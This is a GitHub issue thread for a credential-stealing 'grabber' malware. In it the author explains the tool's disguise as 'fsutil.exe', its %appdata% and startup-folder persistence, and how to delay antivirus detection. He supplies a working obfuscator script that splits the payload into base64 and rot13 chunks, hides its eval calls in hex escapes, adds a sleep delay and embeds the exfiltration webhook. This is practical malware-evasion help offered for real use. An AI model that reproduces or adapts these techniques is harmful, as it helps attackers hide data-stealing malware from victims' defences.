### ISSUE TITLE
Folder In Use

### ISSUE THREAD

**Issue by dotmp4** [Blank-c/Blank-Grabber#34]
it says that the dist folder is in use but its not even open on my taskbar or anywhere else

**Comment by dotmp4** [comment]
Also is there anyway we can find where the stub is hidden?

**Comment by Blank-c** [comment]
Your pc is saying that your dist folder is in use because the grabber hide itself when you used the it. Close it with taskmanager. Process name "fsutil.exe".

If the startup option is set to True, it will hide the exe in %appdata% folder and its vbs script containing the exe's path in shell:startup folder

**Comment by dotmp4** [comment]
thank you very much

**Comment by dotmp4** [comment]
do you have any tips on how we could obfuscate the grabber to give it enough time to run before AV detects it? you could answer here or add my discord are17#1427

**Comment by Blank-c** [comment]
@dotmp4 One way to to obfuacate it with some key and use the random module to bruteforce the key. It might take enough time on some runs. Also, most of the antivirus does not run the program in their space. They just check if the hash of the file or strings in it are similar to other malware or not

**Comment by dotmp4** [comment]
so basically just use key obfuscation and use that to obfuscate the finished exe? I also appreciate you for responding back quickly and solving everyone's problems. your software is amazing

**Comment by Blank-c** [comment]
Thanks for the amazing review.
you can also make the exe sleep instead of the bruteforcing method.
```python
import time

time.sleep(100) #Pause the execution for 100 seconds and then continue```

**Comment by dotmp4** [comment]
where would i input this code?

**Comment by Blank-c** [comment]
Replace the contents in your ooo.py file in data folder with
```python
import base64, codecs, string, random
with open("main.py", encoding="utf-8") as file:
    code = file.read().replace('WEBHOOK = "Do NOT Enter anything here! Enter your webhook in config.txt"', f"WEBHOOK = \"https://discord.com/api/webhooks/{''.join(random.choices(string.digits, k= 18))}/{''.join(random.choices(string.ascii_letters + string.digits, k= 68))}\"")
n = 10
with open("config.txt") as config:
    hook = config.read()
for j in range(n):
    based=base64.b64encode(bytes(code, 'utf-8'))
    a=[]
    for i in range(0, len(based), int(len(based)/4)):
        a.append(based[i : i + int(len(based)/4)].decode('utf-8'))
    if not (j+1)==n:
        prem="""#Obfuscated using BlankOBF\n#https://github.com/Blank-c/BlankOBF\n"""
    else:
        prem="""#Obfuscated using BlankOBF\n#https://github.com/Blank-c/BlankOBF\n\nimport base64, codecs, time\n"""
    code=rf"""{prem}magic = '{a[0]}'
love= '{codecs.encode(a[1], "rot13")}'
god='{a[2]}'
destiny = '{codecs.encode(a[3], "rot13")}'
joy = '\x72\x6f\x74\x31\x33'
trust = eval('\x6d\x61\x67\x69\x63') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x6c\x6f\x76\x65\x2c\x20\x6a\x6f\x79\x29') + eval('\x67\x6f\x64') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x64\x65\x73\x74\x69\x6e\x79\x2c\x20\x6a\x6f\x79\x29')
time.sleep(100)
eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'<string>','exec'))"""

with open("ampl.pyd", "rb") as e:
    con = e.read()
    
with open("structc.pyd", "wb") as e:
    e.write(con+base64.b64encode(hook.encode()).decode().encode('utf-16'))

code = """from PIL import ImageGrab, Image, ImageStat
""" + code

with open('main-o.py', 'w') as file:
    file.write(code)```

**Comment by Blank-c** [comment]
replace the line 22 of your main.py
![image](https://user-images.githubusercontent.com/94945186/177466778-a771fca9-41ae-4c44-8292-aff1948e48b0.png)
with
```python
import time; time.sleep(100)

**Comment by dotmp4** [comment]
just did it and it waited 100 seconds. what does this do exactly?

**Comment by Blank-c** [comment]
It pauses the execution of the exe and continue it after 100 seconds
